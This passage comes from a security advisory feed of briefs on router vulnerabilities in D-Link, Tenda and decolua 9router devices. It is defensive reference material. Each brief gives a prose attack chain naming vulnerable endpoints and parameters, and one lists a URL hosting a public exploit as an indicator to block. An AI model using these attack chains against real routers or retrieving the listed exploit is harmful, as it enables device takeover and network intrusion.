consider replacing the D-Link DIR-605L router with a supported model to mitigate the risk, as there will be no patches issued.\u003c/li\u003e\n\u003cli\u003eExamine network traffic for unusual outbound connections originating from D-Link DIR-605L routers to identify potentially compromised devices (see Sigma rule \u0026ldquo;Detect Outbound Connections from D-Link Routers\u0026rdquo;).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-09T21:16:13Z","date_published":"2026-04-09T21:16:13Z","id":"/briefs/2026-04-dlink-dir605l-bo/","summary":"A remote buffer overflow vulnerability exists in the D-Link DIR-605L version 2.13B01 due to improper handling of the 'curTime' argument in the '/goform/formVirtualServ' POST request handler, potentially allowing attackers to execute arbitrary code.","title":"D-Link DIR-605L Router Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-dlink-dir605l-bo/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.3,"id":"CVE-2026-5842"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["cve","authorization-bypass","router"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA critical security vulnerability, CVE-2026-5842, affects decolua 9router versions up to 0.3.47. The vulnerability resides within an unknown function of the \u003ccode\u003e/api\u003c/code\u003e endpoint, specifically the Administrative API. Successful exploitation of this flaw allows a remote attacker to bypass authorization controls, potentially gaining administrative privileges. A public exploit for this vulnerability has been disclosed, increasing the risk of exploitation. Organizations using vulnerable versions of decolua 9router should upgrade to version 0.3.75 as soon as possible to mitigate the risk. This vulnerability was published on April 9, 2026 and poses a significant threat due to the availability of a public exploit.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a vulnerable decolua 9router instance running a version prior to 0.3.75.\u003c/li\u003e\n\u003cli\u003eThe attacker sends a crafted HTTP request to the \u003ccode\u003e/api\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe crafted request exploits the authorization bypass vulnerability in the targeted function.\u003c/li\u003e\n\u003cli\u003eThe vulnerable application fails to properly validate the attacker\u0026rsquo;s authorization, granting them access.\u003c/li\u003e\n\u003cli\u003eThe attacker gains unauthorized access to administrative functionalities.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the unauthorized access to modify router configurations.\u003c/li\u003e\n\u003cli\u003eThe attacker can then potentially perform actions like changing DNS settings, creating rogue user accounts, or disrupting network services.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-5842 allows attackers to bypass authorization and gain unauthorized administrative access to the decolua 9router. This can lead to complete compromise of the router, allowing attackers to eavesdrop on network traffic, redirect traffic to malicious sites, or disrupt network services. Given the availability of a public exploit, vulnerable routers are at high risk of compromise. This vulnerability can have severe consequences for both home and business networks relying on decolua 9router.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade all decolua 9router instances to version 0.3.75 or later to remediate CVE-2026-5842.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for suspicious activity targeting the \u003ccode\u003e/api\u003c/code\u003e endpoint using the Sigma rule provided below.\u003c/li\u003e\n\u003cli\u003eImplement firewall rules to restrict access to the administrative interface of the router.\u003c/li\u003e\n\u003cli\u003eReview and audit existing router configurations for any unauthorized changes after applying the provided Sigma rule to detect any potential intrusions.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-09T05:16:06Z","date_published":"2026-04-09T05:16:06Z","id":"/briefs/2026-04-decolua-auth-bypass/","summary":"CVE-2026-5842 is an authorization bypass vulnerability in decolua 9router versions up to 0.3.47, allowing remote attackers to gain unauthorized access via manipulation of the /api endpoint.","title":"Decolua 9router Authorization Bypass Vulnerability (CVE-2026-5842)","url":"https://feed.craftedsignal.io/briefs/2026-04-decolua-auth-bypass/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.2,"id":"CVE-2026-5844"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["command-injection","d-link","router","cve-2026-5844"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCVE-2026-5844 describes a critical command injection vulnerability affecting D-Link DIR-882 routers running firmware version 1.01B02. The vulnerability resides in the \u003ccode\u003esprintf\u003c/code\u003e function within the \u003ccode\u003eprog.cgi\u003c/code\u003e script, specifically within the HNAP1 SetNetworkSettings Handler. A remote, unauthenticated attacker can exploit this flaw by manipulating the \u003ccode\u003eIPAddress\u003c/code\u003e argument, injecting arbitrary OS commands that are then executed with elevated privileges. The vulnerability is considered critical due to the potential for complete system compromise and the availability of a public exploit. This vulnerability impacts products that are no longer supported by the maintainer, increasing the risk for users who have not migrated to newer devices.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable D-Link DIR-882 router running firmware version 1.01B02.\u003c/li\u003e\n\u003cli\u003eThe attacker sends a crafted HTTP request to the \u003ccode\u003eprog.cgi\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe HTTP request targets the HNAP1 SetNetworkSettings Handler.\u003c/li\u003e\n\u003cli\u003eThe attacker manipulates the \u003ccode\u003eIPAddress\u003c/code\u003e argument within the HTTP request, injecting malicious OS commands.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003esprintf\u003c/code\u003e function in \u003ccode\u003eprog.cgi\u003c/code\u003e processes the attacker-controlled \u003ccode\u003eIPAddress\u003c/code\u003e argument without proper sanitization.\u003c/li\u003e\n\u003cli\u003eThe injected OS commands are executed on the router\u0026rsquo;s operating system due to the command injection vulnerability in \u003ccode\u003esprintf\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker gains remote code execution on the router.\u003c/li\u003e\n\u003cli\u003eThe attacker can then perform actions such as modifying router settings, eavesdropping on network traffic, or using the router as a botnet node.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-5844 allows a remote attacker to execute arbitrary OS commands on the vulnerable D-Link DIR-882 router. This can lead to a complete compromise of the device, enabling attackers to reconfigure the router, intercept network traffic, or use the compromised device as part of a botnet. The vulnerability affects end-of-life products, meaning no official patches are available. The impact is significant due to the widespread use of these routers in home and small business networks, where they can act as a gateway to internal systems.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect D-Link DIR-882 Command Injection Attempt\u003c/code\u003e to detect suspicious requests to \u003ccode\u003eprog.cgi\u003c/code\u003e containing shell metacharacters.\u003c/li\u003e\n\u003cli\u003eBlock access to the URL \u003ccode\u003ehttps://files.catbox.moe/ei31k1.zip\u003c/code\u003e to prevent the download of the publicly available exploit (IOC).\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for HTTP requests to \u003ccode\u003eprog.cgi\u003c/code\u003e with unusually long \u003ccode\u003eIPAddress\u003c/code\u003e parameters (log source: webserver).\u003c/li\u003e\n\u003cli\u003eImplement network intrusion detection systems (IDS) rules to identify and block exploit attempts targeting CVE-2026-5844 (log source: network_connection).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-09T05:16:06Z","date_published":"2026-04-09T05:16:06Z","id":"/briefs/2026-04-dlink-command-injection/","summary":"A command injection vulnerability (CVE-2026-5844) exists in the D-Link DIR-882 router version 1.01B02, allowing a remote attacker to execute arbitrary OS commands by manipulating the IPAddress argument in the HNAP1 SetNetworkSettings Handler via the prog.cgi script.","title":"D-Link DIR-882 Remote Command Injection Vulnerability (CVE-2026-5844)","url":"https://feed.craftedsignal.io/briefs/2026-04-dlink-command-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-5830"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-5830","tenda","router","buffer-overflow","stack-overflow"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA critical stack-based buffer overflow vulnerability, tracked as CVE-2026-5830, has been identified in Tenda AC15 routers running firmware version 15.03.05.18. The vulnerability resides in the \u003ccode\u003ewebsGetVar\u003c/code\u003e function within the \u003ccode\u003e/goform/SysToolChangePwd\u003c/code\u003e file, which handles password change requests. By crafting malicious requests and manipulating the \u003ccode\u003eoldPwd\u003c/code\u003e, \u003ccode\u003enewPwd\u003c/code\u003e, or \u003ccode\u003ecfmPwd\u003c/code\u003e arguments, an attacker can overwrite the stack, potentially leading to arbitrary code execution. The vulnerability is remotely exploitable by an authenticated user, and publicly available exploit code exists, increasing the risk of widespread exploitation. This poses a significant threat to home and small business networks using affected Tenda AC15 routers.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains unauthorized access to the router\u0026rsquo;s web management interface, potentially through weak credentials or brute-forcing.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP POST request to \u003ccode\u003e/goform/SysToolChangePwd\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe crafted request includes oversized data within the \u003ccode\u003eoldPwd\u003c/code\u003e, \u003ccode\u003enewPwd\u003c/code\u003e, or \u003ccode\u003ecfmPwd\u003c/code\u003e parameters.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ewebsGetVar\u003c/code\u003e function processes the request without proper bounds checking.\u003c/li\u003e\n\u003cli\u003eThe oversized data overflows the stack buffer, overwriting adjacent memory regions.\u003c/li\u003e\n\u003cli\u003eThe attacker carefully crafts the overflow to overwrite the return address on the stack.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ewebsGetVar\u003c/code\u003e function returns, diverting execution to the attacker-controlled address.\u003c/li\u003e\n\u003cli\u003eThe attacker-controlled address contains shellcode that executes arbitrary commands, potentially granting complete control over the device.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows a remote attacker to execute arbitrary code on the affected Tenda AC15 router. This could lead to complete device compromise, including unauthorized access to network traffic, modification of router settings, installation of malware, and use of the compromised device as a botnet node. Given the potentially widespread use of Tenda AC15 routers in home and small business environments, a large number of devices could be vulnerable.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply available patches from Tenda to remediate CVE-2026-5830 as soon as they become available.\u003c/li\u003e\n\u003cli\u003eMonitor webserver logs for suspicious POST requests to \u003ccode\u003e/goform/SysToolChangePwd\u003c/code\u003e with unusually long \u003ccode\u003eoldPwd\u003c/code\u003e, \u003ccode\u003enewPwd\u003c/code\u003e, or \u003ccode\u003ecfmPwd\u003c/code\u003e parameters and deploy the Sigma rule \u003ccode\u003eDetect Tenda AC15 Password Change Overflow\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eImplement strong password policies and multi-factor authentication to prevent unauthorized access to the router\u0026rsquo;s web management interface.\u003c/li\u003e\n\u003cli\u003eRestrict access to the router\u0026rsquo;s web management interface to trusted networks only by configuring firewall rules.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-09T02:16:17Z","date_published":"2026-04-09T02:16:17Z","id":"/briefs/2026-04-tenda-ac15-overflow/","summary":"A stack-based buffer overflow vulnerability (CVE-2026-5830) in Tenda AC15 firmware version 15.03.05.18 allows remote attackers to execute arbitrary code by manipulating password change parameters, potentially leading to complete device compromise.","title":"Tenda AC15 Router Stack-Based Buffer Overflow (CVE-2026-5830)","url":"https://feed.craftedsignal.io/briefs/2026-04-tenda-ac15-overflow/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["d-link","router","airsnitch","vulnerability","network-traffic-manipulation"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThe \u0026lsquo;Airsnitch\u0026rsquo; vulnerability affects D-LINK Router models M60 and DIR-3040. An attacker positioned within an adjacent network can exploit this flaw to circumvent security protocols. This access allows the attacker to potentially expose sensitive data and manipulate network traffic. The specifics of the vulnerability exploitation are not detailed in this advisory, but the impact suggests a significant compromise of network security and data integrity. Defenders should prioritize identifying and mitigating this vulnerability to prevent unauthorized access and data breaches. This vulnerability poses a risk to both home and enterprise networks utilizing the affected D-LINK router models.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains access to an adjacent network, either physically or via compromised wireless access.\u003c/li\u003e\n\u003cli\u003eAttacker sends crafted network packets targeting the D-LINK router\u0026rsquo;s management interface.\u003c/li\u003e\n\u003cli\u003eThe \u0026lsquo;Airsnitch\u0026rsquo; vulnerability is exploited, bypassing authentication or authorization checks.\u003c/li\u003e\n\u003cli\u003eAttacker gains unauthorized access to the router\u0026rsquo;s configuration settings.\u003c/li\u003e\n\u003cli\u003eAttacker modifies DNS settings to redirect traffic to malicious servers.\u003c/li\u003e\n\u003cli\u003eAttacker intercepts and analyzes network traffic, capturing sensitive information like usernames and passwords.\u003c/li\u003e\n\u003cli\u003eAttacker injects malicious code into network traffic, potentially compromising other devices on the network.\u003c/li\u003e\n\u003cli\u003eAttacker maintains persistent access by creating a rogue administrator account or installing malicious firmware.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of the \u0026lsquo;Airsnitch\u0026rsquo; vulnerability can lead to significant compromise of network security. Attackers can gain unauthorized access to sensitive information, manipulate network traffic, and potentially compromise other devices on the network. This can result in data breaches, financial losses, and reputational damage. The number of potential victims is significant, given the widespread use of D-LINK routers in both home and enterprise environments.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAnalyze network traffic for suspicious patterns indicative of unauthorized access attempts to the D-LINK router\u0026rsquo;s management interface to facilitate tuning of existing firewall rules and creation of new rules.\u003c/li\u003e\n\u003cli\u003eMonitor DNS settings on D-LINK routers for unauthorized modifications using network monitoring tools.\u003c/li\u003e\n\u003cli\u003eImplement strict access control policies on the adjacent network to limit the attacker\u0026rsquo;s ability to reach the D-LINK routers.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-08T09:58:56Z","date_published":"2026-04-08T09:58:56Z","id":"/briefs/2026-04-dlink-router-vulnerability/","summary":"The 'Airsnitch' vulnerability in D-LINK Router M60 and DIR-3040 allows an attacker from an adjacent network to bypass security measures, disclose confidential information, and manipulate network traffic.","title":"D-LINK Router M60 and DIR-3040 'Airsnitch' Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-dlink-router-vulnerability/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-5686"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-5686","tenda","router","stack-based buffer overflow","remote code execution"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCVE-2026-5686 is a critical vulnerability affecting Tenda CX12L routers running firmware version 16.03.53.12. This stack-based buffer overflow is located in the \u003ccode\u003efromRouteStatic\u003c/code\u003e function within the \u003ccode\u003e/goform/RouteStatic\u003c/code\u003e file. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request with a malicious \u003ccode\u003epage\u003c/code\u003e argument. Publicly available exploit code exists, increasing the risk of widespread exploitation. Successful exploitation could lead to arbitrary code execution, potentially allowing attackers to gain full control of the affected router. This poses a significant risk to home and small business networks using the vulnerable device.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a Tenda CX12L router running firmware version 16.03.53.12.\u003c/li\u003e\n\u003cli\u003eThe attacker sends a crafted HTTP POST request to \u003ccode\u003e/goform/RouteStatic\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe request includes a \u003ccode\u003epage\u003c/code\u003e argument with a string exceeding the buffer size allocated to the \u003ccode\u003efromRouteStatic\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe oversized \u003ccode\u003epage\u003c/code\u003e argument overwrites adjacent memory on the stack, including the return address.\u003c/li\u003e\n\u003cli\u003eWhen the \u003ccode\u003efromRouteStatic\u003c/code\u003e function returns, it attempts to jump to the overwritten return address controlled by the attacker.\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s payload, injected via the overflowed buffer, is executed with the privileges of the \u003ccode\u003ehttpd\u003c/code\u003e process.\u003c/li\u003e\n\u003cli\u003eThe attacker gains remote code execution on the router.\u003c/li\u003e\n\u003cli\u003eThe attacker can then use the compromised router as a foothold for further attacks, such as network reconnaissance, lateral movement, or data exfiltration.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-5686 allows a remote attacker to execute arbitrary code on the affected Tenda CX12L router. This could lead to a complete compromise of the device, enabling attackers to modify router settings, intercept network traffic, or use the router as a proxy for malicious activities. Given the widespread use of Tenda routers in home and small business networks, this vulnerability could have a significant impact, potentially affecting thousands of users. A successful attack could lead to data breaches, service disruptions, and further compromise of connected devices within the network.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply available patches or firmware updates provided by Tenda to address CVE-2026-5686.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for suspicious POST requests to \u003ccode\u003e/goform/RouteStatic\u003c/code\u003e with unusually long \u003ccode\u003epage\u003c/code\u003e parameters, using the provided Sigma rule.\u003c/li\u003e\n\u003cli\u003eImplement network intrusion detection systems (IDS) to detect and block exploit attempts targeting this vulnerability.\u003c/li\u003e\n\u003cli\u003eRestrict access to the router\u0026rsquo;s administrative interface to trusted networks or IP addresses to limit the attack surface.\u003c/li\u003e\n\u003cli\u003eRegularly review router configurations and security settings to ensure they align with best practices.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-06T22:16:24Z","date_published":"2026-04-06T22:16:24Z","id":"/briefs/2026-04-tenda-cx12l-stack-overflow/","summary":"A stack-based buffer overflow vulnerability (CVE-2026-5686) exists in the Tenda CX12L router version 16.03.53.12, allowing remote attackers to potentially execute arbitrary code by manipulating the 'page' argument in the `/goform/RouteStatic` endpoint.","title":"Tenda CX12L Router Stack-Based Buffer Overflow Vulnerability (CVE-2026-5686)","url":"https://feed.craftedsignal.io/briefs/2026-04-tenda-cx12l-stack-overflow/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8,"id":"CVE-2026-5684"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["tenda","router","buffer-overflow","cve-2026-5684"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA critical stack-based buffer overflow vulnerability has been identified in Tenda CX12L routers running firmware version 16.03.53.12. The vulnerability resides within the \u003ccode\u003efromwebExcptypemanFilter\u003c/code\u003e function in the \u003ccode\u003e/goform/webExcptypemanFilter\u003c/code\u003e file.  An attacker with local network access can exploit this flaw by manipulating the \u003ccode\u003epage\u003c/code\u003e argument passed to this function, leading to arbitrary code execution on the device. The vulnerability, identified as CVE-2026-5684, has a CVSS v3.1 score of 8.0, indicating a high severity. Public exploits for this vulnerability are available, making it crucial for network administrators to address this issue promptly. Successful exploitation could allow an attacker to gain complete control of the router, potentially leading to data theft, network compromise, or denial of service.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains access to the local network where the Tenda CX12L router is located.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request targeting the \u003ccode\u003e/goform/webExcptypemanFilter\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe crafted request includes a \u003ccode\u003epage\u003c/code\u003e argument with a payload exceeding the buffer size allocated for it within the \u003ccode\u003efromwebExcptypemanFilter\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe router processes the HTTP request and passes the overly long \u003ccode\u003epage\u003c/code\u003e argument to the vulnerable function.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003efromwebExcptypemanFilter\u003c/code\u003e function attempts to write the contents of the \u003ccode\u003epage\u003c/code\u003e argument into a fixed-size buffer on the stack.\u003c/li\u003e\n\u003cli\u003eDue to the excessive length of the \u003ccode\u003epage\u003c/code\u003e argument, the buffer overflows, overwriting adjacent memory regions on the stack.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the buffer overflow to overwrite the return address on the stack with the address of malicious code or a ROP chain.\u003c/li\u003e\n\u003cli\u003eWhen the \u003ccode\u003efromwebExcptypemanFilter\u003c/code\u003e function returns, control is transferred to the attacker-controlled code, allowing for arbitrary code execution.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-5684 allows an attacker with local network access to gain complete control of the affected Tenda CX12L router. This can lead to a variety of malicious activities, including unauthorized access to network traffic, modification of router settings, deployment of malicious firmware, and use of the compromised router as a botnet node. Given the availability of public exploits, organizations using this router model are at significant risk. The number of potential victims is dependent on the number of unpatched Tenda CX12L devices deployed.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor webserver logs for HTTP requests targeting the \u003ccode\u003e/goform/webExcptypemanFilter\u003c/code\u003e endpoint with abnormally long \u003ccode\u003epage\u003c/code\u003e parameters to detect potential exploitation attempts. (Log Source: webserver, Rule: \u0026ldquo;Detect Tenda CX12L Web Request with Long Page Parameter\u0026rdquo;)\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Tenda CX12L Stack Buffer Overflow Attempt\u0026rdquo; to identify suspicious process creations following a potential exploit.\u003c/li\u003e\n\u003cli\u003eReview and restrict local network access to the Tenda CX12L router to reduce the attack surface, as the exploit requires local network access.\u003c/li\u003e\n\u003cli\u003eContact Tenda for a security patch or firmware update to address CVE-2026-5684.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-06T22:16:24Z","date_published":"2026-04-06T22:16:24Z","id":"/briefs/2026-04-tenda-cx12l-buffer-overflow/","summary":"A stack-based buffer overflow vulnerability exists in the Tenda CX12L router (version 16.03.53.12) due to improper handling of the 'page' argument in the 'fromwebExcptypemanFilter' function, potentially allowing attackers with local network access to execute arbitrary code.","title":"Tenda CX12L Router Stack-Based Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-tenda-cx12l-buffer-overflow/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-5604"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-5604","buffer-overflow","tenda","router"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCVE-2026-5604 details a critical security vulnerability affecting Tenda CH22 router version 1.0.0.1. The vulnerability is a stack-based buffer overflow located in the \u003ccode\u003eformCertLocalPrecreate\u003c/code\u003e function within the \u003ccode\u003e/goform/CertLocalPrecreate\u003c/code\u003e file, which handles parameters. Attackers can exploit this flaw by manipulating the \u003ccode\u003estandard\u003c/code\u003e argument. The vulnerability can be triggered remotely, meaning an attacker does not need local access to the device. Given that a public exploit is available, this vulnerability poses a significant risk to users of the affected Tenda CH22 router. This allows unauthenticated attackers to potentially gain full control of the device.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker identifies a Tenda CH22 router version 1.0.0.1 exposed to the internet.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request targeting the \u003ccode\u003e/goform/CertLocalPrecreate\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe attacker includes an overly long string as the value for the \u003ccode\u003estandard\u003c/code\u003e parameter in the HTTP request.\u003c/li\u003e\n\u003cli\u003eThe Tenda CH22 router receives the malicious request and passes the \u003ccode\u003estandard\u003c/code\u003e parameter to the \u003ccode\u003eformCertLocalPrecreate\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eformCertLocalPrecreate\u003c/code\u003e function copies the oversized \u003ccode\u003estandard\u003c/code\u003e argument into a fixed-size buffer on the stack without proper bounds checking.\u003c/li\u003e\n\u003cli\u003eThis causes a stack-based buffer overflow, overwriting adjacent memory regions, including the return address of the function.\u003c/li\u003e\n\u003cli\u003eThe attacker controls the overwritten return address to point to attacker-controlled code injected into memory, or to a Return-Oriented Programming (ROP) chain.\u003c/li\u003e\n\u003cli\u003eUpon function return, execution is redirected to the attacker\u0026rsquo;s code, allowing them to execute arbitrary commands on the router.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-5604 allows a remote, unauthenticated attacker to execute arbitrary code on the Tenda CH22 router. This could lead to a complete compromise of the device, allowing the attacker to gain control over network traffic, modify router settings, or use the device as part of a botnet. Given the wide deployment of Tenda routers, a large number of devices could be vulnerable, making this a high-impact vulnerability.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for requests to \u003ccode\u003e/goform/CertLocalPrecreate\u003c/code\u003e with unusually long \u003ccode\u003estandard\u003c/code\u003e parameters to identify potential exploit attempts (see rule: \u0026ldquo;Detect Tenda CH22 Buffer Overflow Attempt via Long Standard Parameter\u0026rdquo;).\u003c/li\u003e\n\u003cli\u003eImplement rate limiting on the \u003ccode\u003e/goform/CertLocalPrecreate\u003c/code\u003e endpoint to mitigate brute-force exploitation attempts.\u003c/li\u003e\n\u003cli\u003eApply any available firmware updates from Tenda to patch CVE-2026-5604.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Tenda CH22 Router POST Request to CertLocalPrecreate\u0026rdquo; to identify suspicious POST requests to the affected endpoint and tune for your environment.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-05T23:16:20Z","date_published":"2026-04-05T23:16:20Z","id":"/briefs/2026-04-tenda-ch22-overflow/","summary":"A stack-based buffer overflow vulnerability (CVE-2026-5604) in Tenda CH22 1.0.0.1 allows remote attackers to execute arbitrary code by manipulating the 'standard' argument in the formCertLocalPrecreate function of the /goform/CertLocalPrecreate file within the Parameter Handler component.","title":"Tenda CH22 Router Stack-Based Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-tenda-ch22-overflow/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-5567"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-5567","buffer-overflow","tenda","router","webserver"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA critical buffer overflow vulnerability has been identified in Tenda M3 router version 1.0.0.10. The vulnerability resides in the \u003ccode\u003esetAdvPolicyData\u003c/code\u003e function within the \u003ccode\u003e/goform/setAdvPolicyData\u003c/code\u003e file, a part of the Destination Handler component. By manipulating the \u003ccode\u003epolicyType\u003c/code\u003e argument, a remote attacker can trigger a buffer overflow, potentially leading to arbitrary code execution. Publicly available exploit code exists, increasing the risk of exploitation. This vulnerability poses a significant threat to organizations utilizing the affected Tenda M3 router, potentially allowing attackers to gain unauthorized access to the network or disrupt services.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a vulnerable Tenda M3 router exposed to the internet or reachable from their network position.\u003c/li\u003e\n\u003cli\u003eAttacker sends a crafted HTTP POST request to \u003ccode\u003e/goform/setAdvPolicyData\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe POST request includes a malicious \u003ccode\u003epolicyType\u003c/code\u003e argument designed to overflow the buffer in the \u003ccode\u003esetAdvPolicyData\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003esetAdvPolicyData\u003c/code\u003e function in \u003ccode\u003e/goform/setAdvPolicyData\u003c/code\u003e processes the \u003ccode\u003epolicyType\u003c/code\u003e argument without proper bounds checking.\u003c/li\u003e\n\u003cli\u003eThe excessive data provided in the \u003ccode\u003epolicyType\u003c/code\u003e argument overwrites adjacent memory regions.\u003c/li\u003e\n\u003cli\u003eThe attacker carefully crafts the overflow to overwrite critical data or inject malicious code into the process\u0026rsquo;s memory space.\u003c/li\u003e\n\u003cli\u003eThe injected code is executed, giving the attacker control over the router.\u003c/li\u003e\n\u003cli\u003eThe attacker can then use the compromised router as a foothold to pivot to other devices on the network, exfiltrate sensitive data, or cause denial of service.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this buffer overflow vulnerability allows a remote attacker to execute arbitrary code on the Tenda M3 router. This could lead to a complete compromise of the device, allowing the attacker 